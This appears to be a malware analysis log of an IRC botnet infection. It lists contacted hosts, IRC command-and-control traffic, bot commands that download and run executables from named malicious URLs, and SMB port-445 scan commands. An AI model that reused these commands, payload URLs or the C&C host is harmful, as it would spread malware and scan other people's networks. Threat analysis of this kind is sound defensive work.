Remote Host Port Number
192.168.62.2 445
69.10.52.149 80
74.206.242.164 80
91.201.66.5 1234
NICK [N00_USA_XP_8141634]x
MODE [N00_USA_XP_8141634]x
A -ix
JOIN #a1
PRIVMSG [N00_USA_XP_8141
@ :download; File download: 76.5KB to: C:up2.exe @ 76.5KB/sec.
PRIVMSG #spam :HTTP SET http://black-cash.com/a11.exe
@ :download; Created process: “C:up2.exe”, PID:
@ :scan; Sequential Port Scan started on 192.168.62.0:445 with a delay of 3 seconds for 0 minutes using 10 threads.
USER SP2-844 * 0 :COMPUTERNAME
@ :scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 3 seconds for 0 minutes using 25 threads.
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.
The data identified by the following URLs was then requested from the remote web server:
http://digitaltoolsworld.in/install.48208.exe
http://www.pr0.net/deny2/azenv.php
UPDATE:
NICK [N00_USA_XP_2161241]x
JOIN #a4
MODE [N00_USA_XP_2161241]x
A -ix
PRIVMSG #spam :HTTP SET http://black-cash.com/file.exe
PRIVMSG [N00_USA_XP_2161
@ :scan; Sequential Port Scan started on 192.168.248.0:445 with a delay of 3 seconds for 0 minutes using 10 threads.
USER SP2-351 * 0 :COMPUTERNAME
@ :scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 3 seconds for 0 minutes using 25 threads.
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.
infos about hosting:
http://whois.domaintools.com/91.201.66.5